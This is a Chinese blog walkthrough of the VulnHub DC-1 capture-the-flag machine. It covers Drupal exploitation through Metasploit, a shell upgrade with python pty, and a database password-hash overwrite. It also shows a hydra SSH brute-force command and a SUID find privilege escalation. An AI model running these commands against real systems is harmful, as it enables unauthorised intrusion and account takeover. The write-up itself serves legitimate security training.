靶机概览
信息收集
- nmap信息收集
网站信息收集
- 使用nikto来收集一下
渗透攻击
- getshell
- - Flag1
  - Flag2
- 进入数据库
- 拿下数据库的root账号
- 登录网站
- - Flag3
  - Flag4
- 爆破ssh
- - Flag4
- 提权
- - Flag5

文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

靶机概览

详情介绍请参考下载地址
任务目标：拿下5个flag
下载地址：https://www.vulnhub.com/entry/dc-1,292/
靶机界面：

信息收集

由于我这里采用了NAT，所以很容易确定目标机器，如果你的网络环境里有众多机器，并且系统版本与靶机相似，且不方便更换连接虚拟机的方式，你可以先查看一下DC1的MAC，这样做主机发现时可以通过MAC来过滤靶机。

nmap信息收集

1：使用nmap作网段的主机发现，确定靶机地址是192.168.40.136

2：继续使用nmap对靶机做进一步探测
看这样子，还是先去80端口看看吧，不出意外的话，应该是先打80，再爆破22

网站信息收集

首先看到网站长这个样子

看到“Drupal Site”基本上就有思路了。

国外三大开源php CMS
drupal        【无专用扫描器，但是msf内置了模块】
wordpress     【有专用扫描器】
joomla        【有专用扫描器】

使用nikto来收集一下

看到Drupal的版本是7.x

很友好，直接给出了msf，那就来吧

渗透攻击

随意选择一个模块

查看一下info信息，这和模块适合7.X

getshell

已经看到第一个flag了

Flag1

我们被告知要去找网站的配置文件

Flag2

再往下面看，会发现有一些和数据库相关的内容

进入数据库

首先需要进入shell，然后确认一下端口，看数据库开了没。然后进看到3306端口开了

这个时候需要注意，不能直接msf进入，因为msf是从web服务打进去的，而HTTP是瞬时协议，需要让python来做一个中介。
交互式shell

交互式shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
或者
python -c 'import pty; pty.spawn("/bin/bash")'

有了python中介，进入数据库，就是这么神奇

按照拿下flag2时的提示，进入drupaldb

表的最后有一张users表，查看一下

*************************** 1. row ***************************uid: 0name:pass:mail:theme:signature:
signature_format: NULLcreated: 0access: 0login: 0status: 0timezone: NULLlanguage:picture: 0init:data: NULL
*************************** 2. row ***************************uid: 1name: adminpass: $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDRmail: admin@example.comtheme:signature:
signature_format: NULLcreated: 1550581826access: 1550583852login: 1550582362status: 1timezone: Australia/Melbournelanguage:picture: 0init: admin@example.comdata: b:0;
*************************** 3. row ***************************uid: 2name: Fredpass: $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGgmail: fred@example.orgtheme:signature:
signature_format: filtered_htmlcreated: 1550581952access: 1550582225login: 1550582225status: 1timezone: Australia/Melbournelanguage:picture: 0init: fred@example.orgdata: b:0;
3 rows in set (0.00 sec)

拿下数据库的root账号

破解root的密码的密文不容易，尝试覆盖root的密码
1：现在生成一个密码，明文为alice

php scripts/password-hash.sh alice

2：进入数据库
输入如下命令

update users set pass="$S$DT7skRNNPHGv673OYXvY9YecYrhUL1GX5ikaJKTZ2zvynIc9erSU" where uid=1;

3：root的账密现在已经有了admin：alice

登录网站

随便点点

Flag3

拿下flag3，此时页面上线索指向了passwd，应该是/etc/passwd

Flag4

msf端的shell退出数据库，去看看/etc/passwd

到此为止，线索似乎断了。再回想一下，现在flag4是一个用户，而靶机开放了80和22端口，所以可以考虑爆破ssh了，就以flag4的身份

爆破ssh

使用hydra做ssh爆破

hydra -l flag4 -P /usr/share/john/password.lst 192.168.40.136 ssh -vV -f

爆出账密是flag4：orange

使用ssh登录系统

Flag4

flag4暗示可以使用相同的方法拿下root

所以现在的路线就是要看一看root的家目录，那里应该有最后一个flag，即：要提权了

提权

探测SUID和sudo -l，结果发现find就有SUID，得来全不费工夫

find -exec "/bin/sh" \;

Flag5

vulnhub之DC1靶机相关推荐

玩转靶机Vulnhub：DC1（详细）
靶机Vulnhub:DC1 靶机和环境准备: 主机发现: 信息收集: 发现并利用漏洞 SUID提权: 总结: 靶机和环境准备: 宿主机:kaili dc1靶机下载:DC: 1 ~ VulnHub 主机 ...
DC系列：1 （DC-1靶机，初级渗透详细教程）
DC-1靶机渗透环境搭建详情描述使用工具一:信息收集基础信息查询 0x01 查看存活主机 0x02 查看开放端口 0x03 查看端口服务 0x04 扫描网站根目录及指纹信息 0x05 访问 ...
渗透练习 DC-1靶机
导出的pdf下载即可复现SLR大哥的DC-1 靶机 DC-1 安装 VM打开DC-1.ova[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Ql3Hejjo-16163 ...
vulnhub-DC系列通关记DC1靶机渗透
声明:此文章仅供参考学习,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关. 目录 flag1 信息收集漏洞利用后渗透 flag2 flag3 flag4 最终flag ...
DC1靶机解析+思路
DC系列---dc1靶机解析确定IP: 首先切换网卡到nat模式,再用kali中的nmap工具扫描当前网段的主机,查看开放主机指令:nmap -sS 网段试一下,找dc1的ip 打开界面是这样, ...
记录一下 DC1靶机渗透
一.准备首先kaili攻击机和DC1靶机都是桥接网络,为了nmap扫描(桥接网络在设置里). 二.namp扫描 1.首先扫描一下这个网段很容易可以看见DC1的靶机的ip地址192.168.1.10 ...
VulnHub DC1靶机渗透测试
1. 说明虚拟机环境为VM VirtualBox2. 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机:DC1 攻击机:kali 攻击目标:5个fl ...
vulnhub:DC1靶机
一.主机扫描扫描ip 查看开放的端口开启了22.80.111.53567端口.还有操作系统的信息二.信息收集先去看看80端口的情况利用Firefox的Wappalyzer插件发现管理系统为D ...
渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程！
Android4靶机简介名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...

vulnhub之DC1靶机

靶机概览

信息收集

nmap信息收集

网站信息收集

使用nikto来收集一下

渗透攻击

getshell

Flag1

Flag2

进入数据库

拿下数据库的root账号

登录网站

Flag3

Flag4

爆破ssh

Flag4

提权

Flag5

vulnhub之DC1靶机相关推荐

最新文章

热门文章